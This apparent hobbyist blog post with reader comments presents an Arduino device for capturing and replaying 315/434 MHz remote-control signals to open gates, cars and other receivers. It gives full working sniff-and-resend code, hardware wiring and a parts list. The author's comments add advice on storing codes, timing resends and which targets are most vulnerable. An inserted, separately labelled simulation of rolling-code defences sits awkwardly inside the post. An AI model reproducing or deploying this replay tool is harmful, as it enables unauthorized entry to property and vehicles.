RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

Arduino

The more I get to play with hardware, the more I see how security is lacking or implemented poorly (and I'm being very polite here). This time I would like to share my 315 MHz/434 MHz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device.

TIP – The size of the antenna is VERY important. Don't neglect it: use the right length, and use a wavelength calculator for future reference.

The story

I wanted to see how easy it is to open a keyless car using an Arduino, and then to simultaneously control multiple appliances operating on different frequencies (315 MHz/434 MHz).

Using the following design, you can easily make a fuzzer to randomly open/close/control all kinds of RF receivers out there. You have been warned.

The current version of the sniffer resends whatever it sniffs 10 times. The behaviour is easily changed.

I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished.
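The reason a capture-and-resend device works against the "poorly protected" receivers this post is aimed at is that a fixed-code remote sends the identical frame on every press, so one capture is as good as the remote. The simulation below is an added example, not part of the original post or of the RCSwitch library: it models a fixed-code receiver next to a rolling-code receiver (per-press counter, shared key, authentication tag, acceptance window) and checks what each does when a single captured frame is resent ten times, mirroring the sketch's resend count. The key, serial number, counter values and the `toy_mac()` mixing function are all constructed for the example; `toy_mac()` only stands in for a real MAC or block cipher and is not a secure primitive.

```cpp
#include <cstdint>
#include <cstdio>

// Fixed-code receiver: the class of device a capture-and-resend sketch can open.
// The remote sends the same code on every press, so the code alone is the credential.
struct FixedCodeReceiver {
    uint32_t paired_code;
    bool accept(uint32_t code) const { return code == paired_code; }
};

// Rolling-code frame: device serial, per-press counter, and a tag computed over
// (serial, counter) under a key shared between remote and receiver.
struct RollingFrame {
    uint32_t serial;
    uint32_t counter;
    uint32_t tag;
};

// Toy keyed mixing function, constructed for this example only. It stands in for a
// real MAC or block cipher and is NOT cryptographically sound.
static uint32_t toy_mac(uint64_t key, uint32_t serial, uint32_t counter) {
    uint64_t v = key ^ ((uint64_t)serial << 32) ^ (uint64_t)counter;
    for (int i = 0; i < 4; i++) {      // a few xorshift-multiply rounds
        v ^= v >> 29;
        v *= 0x9E3779B97F4A7C15ULL;
        v ^= v >> 32;
    }
    return (uint32_t)v;
}

struct RollingRemote {
    uint64_t key;
    uint32_t serial;
    uint32_t counter;
    RollingFrame press() {
        counter++;                     // a counter value is never reused
        return {serial, counter, toy_mac(key, serial, counter)};
    }
};

struct RollingReceiver {
    uint64_t key;
    uint32_t serial;
    uint32_t last_counter;             // highest counter accepted so far
    uint32_t window;                   // how far ahead a counter may jump (missed presses)
    bool accept(const RollingFrame &f) {
        if (f.serial != serial) return false;                          // not our remote
        if (toy_mac(key, f.serial, f.counter) != f.tag) return false;  // tag mismatch: forged/tampered
        if (f.counter <= last_counter) return false;                   // already seen: replay
        if (f.counter - last_counter > window) return false;           // too far ahead: needs resync
        last_counter = f.counter;
        return true;
    }
};

// Constructed key and serial shared by the scenarios below.
static const uint64_t kKey = 0x0123456789ABCDEFULL;
static const uint32_t kSerial = 0x00C0FFEE;

// Scenario 1: a captured fixed code is resent once. Expected: accepted.
bool fixed_code_replay_accepted() {
    FixedCodeReceiver gate{0x5A5A5A};
    uint32_t captured = 0x5A5A5A;      // the value a sniffer would have logged
    return gate.accept(captured);
}

// Scenario 2: the receiver hears the genuine press, then the same frame is resent
// `resends` times. Returns how many of the resends were accepted. Expected: 0.
int rolling_code_replays_accepted(int resends) {
    RollingRemote remote{kKey, kSerial, 1000};
    RollingReceiver gate{kKey, kSerial, 1000, 16};
    RollingFrame genuine = remote.press();
    if (!gate.accept(genuine)) return -1;   // sanity check: the real press must work
    int accepted = 0;
    for (int i = 0; i < resends; i++)
        if (gate.accept(genuine)) accepted++;
    return accepted;
}

// Scenario 3: a captured frame with the counter bumped but the tag left unchanged.
// Expected: rejected, because the tag no longer verifies.
bool rolling_code_tampered_counter_accepted() {
    RollingRemote remote{kKey, kSerial, 1000};
    RollingReceiver gate{kKey, kSerial, 1000, 16};
    RollingFrame f = remote.press();
    gate.accept(f);
    f.counter += 1;
    return gate.accept(f);
}

// Scenario 4: three presses out of range, then one in range. Expected: accepted,
// because the counter jumped by 4 and the window is 16.
bool rolling_code_missed_presses_accepted() {
    RollingRemote remote{kKey, kSerial, 1000};
    RollingReceiver gate{kKey, kSerial, 1000, 16};
    remote.press(); remote.press(); remote.press();
    return gate.accept(remote.press());
}

int main() {
    printf("fixed-code replay accepted:     %d\n", fixed_code_replay_accepted());
    printf("rolling-code replays accepted:  %d of 10\n", rolling_code_replays_accepted(10));
    printf("tampered counter accepted:      %d\n", rolling_code_tampered_counter_accepted());
    printf("missed presses then accepted:   %d\n", rolling_code_missed_presses_accepted());
    return 0;
}
```

The order of the checks in `RollingReceiver::accept()` matters: the tag is verified before the counter is compared, so a frame that fails authentication never advances `last_counter`, and the window is what lets a remote pressed out of range resynchronise without allowing the counter to be pushed arbitrarily far ahead.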

Shopping List

Amount | Part Type               | Properties
2      | Inductor                | wire antenna
1      | Red LED, 5 mm package   | 5 mm [THT]; leg yes; color Red (633 nm)
1      | Arduino Uno (Rev3)      | type Arduino UNO (Rev3)
1      | 315 MHz RF-LINK_RX      | package rf-link_rx; part # WRL-10533
1      | 434 MHz RF-LINK_RX      | package rf-link_rx; part # WRL-10532
1      | 315 MHz RF-LINK_TX      | package rf-link_tx; part # WRL-10535
1      | 434 MHz RF-LINK_TX      | package rf-link_tx; part # WRL-10534

Scheme

We connect both receiver/transmitter pairs as follows:

[Breadboard diagram: RF_Sniffer_bb]

Code

And here is the Arduino code. Use at your own risk.

/*
 * RF Sniffer (C) Elia Yehuda 2014
 *
 * This program was coded.
 *
 * No warranty whatsoever.
 * Using this program will cause something, most likely problems.
 *
 */

#include <RCSwitch.h>

// number of times to resend a sniffed value. use 0 to disable.
#define RESEND_SNIFFED_VALUES 10

// yes, that's the LED pin #
#define LED_PIN 13

// class for 315 receiver & transmitter
RCSwitch rf315Switch = RCSwitch();
// class for 434 receiver & transmitter
RCSwitch rf434Switch = RCSwitch();

void setup()
{
        // print fast to console
        Serial.begin(115200);

        // the LED pin must be configured as an output before digitalWrite() can drive it
        pinMode(LED_PIN, OUTPUT);

        // 315 receiver on interrupt #0 (pin #2)
        rf315Switch.enableReceive(0);
        // 315 transmitter on pin #4
        rf315Switch.enableTransmit(4);
        // how many resends
        rf315Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);

        // 434 receiver on interrupt #1 (pin #3)
        rf434Switch.enableReceive(1);
        // 434 transmitter on pin #5
        rf434Switch.enableTransmit(5);
        // how many resends
        rf434Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);

        Serial.println("[+] Listening");
}

// simple decimal-to-binary-ascii procedure
// (returns a static buffer that is overwritten on every call)
char *tobin32(unsigned long x)
{
        static char b[33];
        b[32] = '\0';

        for (int z = 0; z < 32; z++) {
                b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
        }

        return b;
}

// the switch is taken by reference so resetAvailable() acts on the real
// object rather than on a copy
void process_rf_value(RCSwitch &rfswitch, int rf)
{
        char str[120];
        unsigned long value;

        // flash a light to show transmission
        digitalWrite(LED_PIN, HIGH);

        value = rfswitch.getReceivedValue();
        if (value) {
                sprintf(str, "[+] %d Received: %s / %010lu / %02u bit / Protocol = %u",
                        rf, tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol());
                Serial.println(str);

                // resend the sniffed value (RESEND_SNIFFED_VALUES times)
                rfswitch.send(value, rfswitch.getReceivedBitlength());
        } else {
                // a value of 0 means nothing decodable was received, so there is nothing to resend
                sprintf(str, "[-] %d Received: Unknown encoding (0)", rf);
                Serial.println(str);
        }

        // reset the switch to allow more data to come
        rfswitch.resetAvailable();
        // stop light to show end of transmission
        digitalWrite(LED_PIN, LOW);
}

void loop()
{
        if (rf315Switch.available()) {
                process_rf_value(rf315Switch, 315);
        }

        if (rf434Switch.available()) {
                process_rf_value(rf434Switch, 434);
        }
}

6 thoughts on “RF Sniffer – open gates, cars, and RF remote controlled devices with ease.”

    1. ofc.

      The hw scheme I provided is 100% the same as the one I used in my testing. The sw part is stripped-down code from my full project, but is enough to get one started.

      With a few modifications to the code, one can simply record the sniffed data instead of immediately resending it. Also, for useful results, when resending, a delay() should be considered for obvious reasons ;)

      Most vulnerable targets I found are remote-controlled gates and old cars. Also, weather stations seem to produce a lot of noise.

      Using the same logic, one can add 816 MHz tx/rx to cover the most widely used RF out there. And rule them all :)

  1. Awesome project. Can you give any details as to how you can save the codes it sniffs? I'm looking to do an automation project and this fits the bill.

    Thanks
